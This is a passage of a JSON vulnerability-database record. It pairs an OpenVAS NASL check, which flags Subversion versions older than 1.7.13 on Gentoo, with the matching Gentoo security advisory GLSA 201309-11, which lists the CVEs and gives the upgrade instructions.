Copyright:\n# Copyright (c) 
2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121025\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-11\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Subversion. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-11\");\n script_cve_id(\"CVE-2010-4539\", \"CVE-2010-4644\", \"CVE-2011-0715\", \"CVE-2011-1752\", \"CVE-2011-1783\", \"CVE-2011-1921\", \"CVE-2013-1845\", \"CVE-2013-1846\", \"CVE-2013-1847\", \"CVE-2013-1849\", \"CVE-2013-1884\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\", \"CVE-2013-4131\", \"CVE-2013-4277\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201309-11\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-vcs/subversion\", unaffected: make_list(\"ge 1.7.13\"), vulnerable: make_list(\"lt 1.7.13\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4644", "CVE-2010-4539", "CVE-2011-1783", "CVE-2013-4277", "CVE-2013-1884", "CVE-2011-1752", "CVE-2013-1849", "CVE-2013-1845", "CVE-2013-1846", "CVE-2011-1921", "CVE-2011-0715", "CVE-2013-1847", "CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "### 
Background\n\nSubversion is a versioning system designed to be a replacement for CVS. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Subversion. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition or obtain sensitive information. A local attacker could escalate his privileges to the user running svnserve. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Subversion users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/subversion-1.7.13\"", "edition": 1, "modified": "2013-09-23T00:00:00", "published": "2013-09-23T00:00:00", "id": "GLSA-201309-11", "href": "https://security.gentoo.org/glsa/201309-11", "type": "gentoo", "title": "Subversion: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}